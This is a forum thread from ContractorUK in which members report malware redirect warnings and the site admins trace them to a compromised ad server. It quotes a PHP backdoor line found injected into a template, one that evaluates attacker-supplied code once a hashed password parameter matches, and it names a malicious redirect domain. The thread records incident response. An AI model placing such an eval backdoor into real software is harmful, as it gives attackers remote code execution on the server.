• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

CUK triggers malware warning

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All

Mine is fine using Tapatalk and Chrome on Android.

Using a PiHole as my DNS server...
    I was an IPSE Consultative Council Member, until the BoD abolished it. I am not an IPSE Member, since they have no longer have any relevance to me, as an IT Contractor. Read my lips...I recommend QDOS for ALL your Insurance requirements (Contact me for a referral code).

Comment

Originally posted by mudskipper View Post
      Last proper fax I had was 1990s.
      With Mr MS or someone else?

Comment

just got a message something is trying to redirect me when going into a thread in general. Mcafee is blocking it

Comment

The Thing is still lurking, but admin and I have been investigating and we've almost got it cornered

Comment

Originally posted by NickFitz View Post
            The Thing is still lurking, but admin and I have been investigating and we've almost got it cornered
            When you find it, be sure to kill it with fire....!

Comment

Had a look on NYE and couldn't replicate so had a couple of looks at this with Nick today. Definitely ad server been hacked and just trying to trace the source now, it's an elusive little beggar. Might just nuke it from orbit, it's the only way to be sure...

Comment

I had edited one of the templates that had a strange new line of code added to it:

Code:
                if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6d46ba53fe38d9cb6d84b3fd07e9fe85'){@eval($_REQUEST['zoneId']);}
                But the ads hadn't gone, nipped out to pick one of the kids up from a mate's house and, while the iframes are still there, the ad calls have gone. Will update the banner server this evening and make sure all the code is replaced just in case there is a back door in there somewhere. Fingers crossed that should sort it.

Comment

Originally posted by administrator View Post
                  I had edited one of the templates that had a strange new line of code added to it:

Code:
                  if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6d46ba53fe38d9cb6d84b3fd07e9fe85'){@eval($_REQUEST['zoneId']);}
                  But the ads hadn't gone, nipped out to pick one of the kids up from a mate's house and, while the iframes are still there, the ad calls have gone. Will update the banner server this evening and make sure all the code is replaced just in case there is a back door in there somewhere. Fingers crossed that should sort it.
                  If you want to see what's been lurking on every page in an iframe hidden offscreen, paste this into your browser's location bar (N.B. assuming your browser supports JavaScript in the location bar):

Code:
                  javascript:void(document.getElementById('ifr_ads_banners').style.left=0,document.getElementById('ifr_ads_banners').style.top=0)

Comment

It wisnae me! - honest. - a big boy did it, and ran away

Comment

Mcafee says: redirect blocked httpsgetmyfastclicks.mobi (note the bit before .mobi all one word including https)

Comment

Working...
                      X